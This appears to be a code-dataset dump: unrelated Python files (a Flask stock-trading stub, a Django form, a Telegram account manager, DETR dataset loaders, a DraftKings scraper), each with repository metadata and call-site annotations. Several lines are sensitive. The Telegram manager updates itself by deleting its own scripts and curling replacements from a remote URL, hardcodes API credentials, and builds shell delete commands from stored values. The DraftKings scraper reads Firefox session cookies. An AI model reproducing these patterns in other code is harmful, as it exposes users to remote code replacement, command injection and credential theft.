# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| [((421, 436), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (426, 436), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((932, 941), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (939, 941), False, 'from tempfile import mkdtemp\n'), ((1024, 1036), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (1031, 1036), False, 'from flask_session import Session\n'), ((1091, 1118), 'cs50.SQL', 'SQL', (['"""sqlite:///finance.db"""'], {}), "('sqlite:///finance.db')\n", (1094, 1118), False, 'from cs50 import SQL\n'), ((1154, 1179), 'os.environ.get', 'os.environ.get', (['"""API_KEY"""'], {}), "('API_KEY')\n", (1168, 1179), False, 'import os\n'), ((1316, 1331), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1323, 1331), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1446, 1461), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1453, 1461), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1568, 1583), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1575, 1583), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1697, 1712), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (1710, 1712), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2843, 2858), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (2856, 2858), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2905, 2918), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2913, 2918), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3034, 3049), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3041, 3049), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3152, 3167), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3159, 3167), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3285, 3300), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3292, 3300), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3433, 3456), 'helpers.apology', 'apology', (['e.name', 'e.code'], {}), '(e.name, e.code)\n', (3440, 3456), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2609, 2622), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2617, 2622), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2722, 2751), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (2737, 2751), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3400, 3421), 'werkzeug.exceptions.InternalServerError', 'InternalServerError', ([], {}), '()\n', (3419, 3421), False, 'from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\n'), ((1872, 1900), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (1888, 1900), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((1921, 1958), 'helpers.apology', 'apology', (['"""must provide username"""', '(403)'], {}), "('must provide username', 403)\n", (1928, 1958), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2211, 2239), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (2227, 2239), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2419, 2467), 'helpers.apology', 'apology', (['"""invalid username and/or password"""', '(403)'], {}), "('invalid username and/or password', 403)\n", (2426, 2467), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2017, 2045), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2033, 2045), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2066, 2103), 'helpers.apology', 'apology', (['"""must provide password"""', '(403)'], {}), "('must provide password', 403)\n", (2073, 2103), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2369, 2397), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2385, 2397), False, 'from flask import Flask, flash, redirect, render_template, request, session\n')] |
iurykrieger96/alura-django | users/forms.py | d8ed9998ccbc629127b2c6ca3ed3798da9a578f3 | from django import forms
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
class UserForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
password = forms.CharField(required=True)
phone = forms.CharField(required=True)
name_company = forms.CharField(required=True)
def is_valid(self):
valid = True
if not super(UserForm, self).is_valid():
self.add_erro('Por favor, verifique os dados informados')
valid = False
user_exists = User.objects.filter(username=self.data['name']).exists()
if user_exists:
self.add_erro('Usuario ja existente')
valid = False
return valid
def add_erro(self, message):
self._errors.setdefault(forms.forms.NON_FIELD_ERRORS, ErrorList()).append(message)
| [((151, 181), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (166, 181), False, 'from django import forms\n'), ((194, 225), 'django.forms.EmailField', 'forms.EmailField', ([], {'required': '(True)'}), '(required=True)\n', (210, 225), False, 'from django import forms\n'), ((241, 271), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (256, 271), False, 'from django import forms\n'), ((284, 314), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (299, 314), False, 'from django import forms\n'), ((334, 364), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (349, 364), False, 'from django import forms\n'), ((578, 625), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': "self.data['name']"}), "(username=self.data['name'])\n", (597, 625), False, 'from django.contrib.auth.models import User\n'), ((853, 864), 'django.forms.utils.ErrorList', 'ErrorList', ([], {}), '()\n', (862, 864), False, 'from django.forms.utils import ErrorList\n')] |
Kiku-Reise/vsmart | python/manager.py | dd8cf84816da8734e72dbb46c07694f561597648 | from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| [((179, 185), 'colorama.init', 'init', ([], {}), '()\n', (183, 185), False, 'from colorama import init, Fore\n'), ((421, 454), 'os.system', 'os.system', (['"""pip install requests"""'], {}), "('pip install requests')\n", (430, 454), False, 'import pickle, os\n'), ((1014, 1030), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (1023, 1030), False, 'import pickle, os\n'), ((1049, 1067), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (1058, 1067), False, 'import pickle, os\n'), ((1722, 1753), 'pickle.dump', 'pickle.dump', (['[parsed_number]', 'g'], {}), '([parsed_number], g)\n', (1733, 1753), False, 'import pickle, os\n'), ((2003, 2088), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{number}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{number}', 3910389,\n '86f861352f0ab76a251866059a6adbd6')\n", (2017, 2088), False, 'from telethon.sync import TelegramClient\n'), ((2649, 2657), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2654, 2657), False, 'from time import sleep\n'), ((824, 845), 'random.choice', 'random.choice', (['colors'], {}), '(colors)\n', (837, 845), False, 'import random\n'), ((2774, 2859), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{phone}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{phone}', 3910389, '86f861352f0ab76a251866059a6adbd6'\n )\n", (2788, 2859), False, 'from telethon.sync import TelegramClient\n'), ((4462, 4504), 'os.system', 'os.system', (['f"""del sessions\\\\{session_file}"""'], {}), "(f'del sessions\\\\{session_file}')\n", (4471, 4504), False, 'import pickle, os\n'), ((4531, 4571), 'os.system', 'os.system', (['f"""rm sessions/{session_file}"""'], {}), "(f'rm sessions/{session_file}')\n", (4540, 4571), False, 'import pickle, os\n'), ((4672, 4695), 'pickle.dump', 'pickle.dump', (['account', 'f'], {}), '(account, f)\n', (4683, 4695), False, 'import pickle, os\n'), ((2445, 2459), 'pickle.load', 'pickle.load', (['h'], {}), '(h)\n', (2456, 2459), False, 'import pickle, os\n'), ((5066, 5157), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt"""'], {}), "(\n 'https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')\n", (5078, 5157), False, 'import requests\n'), ((3732, 3755), 'pickle.dump', 'pickle.dump', (['[Phone]', 'k'], {}), '([Phone], k)\n', (3743, 3755), False, 'import pickle, os\n'), ((4040, 4054), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4051, 4054), False, 'import pickle, os\n'), ((5887, 5986), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py'\n )\n", (5896, 5986), False, 'import pickle, os\n'), ((5993, 6096), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py'\n )\n", (6002, 6096), False, 'import pickle, os\n'), ((5642, 5665), 'os.system', 'os.system', (['"""del add.py"""'], {}), "('del add.py')\n", (5651, 5665), False, 'import pickle, os\n'), ((5686, 5713), 'os.system', 'os.system', (['"""del manager.py"""'], {}), "('del manager.py')\n", (5695, 5713), False, 'import pickle, os\n'), ((5756, 5778), 'os.system', 'os.system', (['"""rm add.py"""'], {}), "('rm add.py')\n", (5765, 5778), False, 'import pickle, os\n'), ((5799, 5825), 'os.system', 'os.system', (['"""rm manager.py"""'], {}), "('rm manager.py')\n", (5808, 5825), False, 'import pickle, os\n')] |
rus-kh/m2ee-tools | src/m2ee/client_errno.py | 70000796a53131bb1cd8d199f48cd5e7aab2c505 | #
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in both a temporary or permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
| [] |
andrewliao11/detr | datasets/__init__.py | 944bb60e090e6b72aede9574cd2b7f75202cfe05 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| [] |
sansbacon/dkhomeleague | dkhomeleague/dkhomeleague.py | 17ab695df9ceccf5b7f135181b19ade8d47add5f | # dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| [((724, 737), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (735, 737), False, 'from requests_html import HTMLSession\n'), ((1310, 1335), 'browser_cookie3.firefox', 'browser_cookie3.firefox', ([], {}), '()\n', (1333, 1335), False, 'import browser_cookie3\n'), ((4779, 4802), 'pandas.DataFrame', 'pd.DataFrame', (['container'], {}), '(container)\n', (4791, 4802), True, 'import pandas as pd\n'), ((9238, 9269), 'pdsheet.get_app', 'pdsheet.get_app', (['json_secret_fn'], {}), '(json_secret_fn)\n', (9253, 9269), False, 'import pdsheet\n'), ((10047, 10085), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10068, 10085), False, 'import pdsheet\n'), ((10701, 10739), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10722, 10739), False, 'import pdsheet\n'), ((526, 547), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (545, 547), False, 'import logging\n'), ((605, 631), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (614, 631), False, 'import os\n'), ((682, 706), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (691, 706), False, 'import os\n'), ((4496, 4517), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (4515, 4517), False, 'import logging\n'), ((4575, 4601), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (4584, 4601), False, 'import os\n'), ((4652, 4676), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (4661, 4676), False, 'import os\n'), ((9168, 9189), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (9187, 9189), False, 'import logging\n'), ((9311, 9345), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_SPREADSHEET"""'], {}), "('DK_LEAGUE_SPREADSHEET')\n", (9320, 9345), False, 'import os\n'), ((9536, 9569), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['self.sskey'], {}), '(self.sskey)\n', (9557, 9569), False, 'import pdsheet\n'), ((487, 514), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (504, 514), False, 'import logging\n'), ((4457, 4484), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4474, 4484), False, 'import logging\n'), ((9129, 9156), 'logging.getLogger', 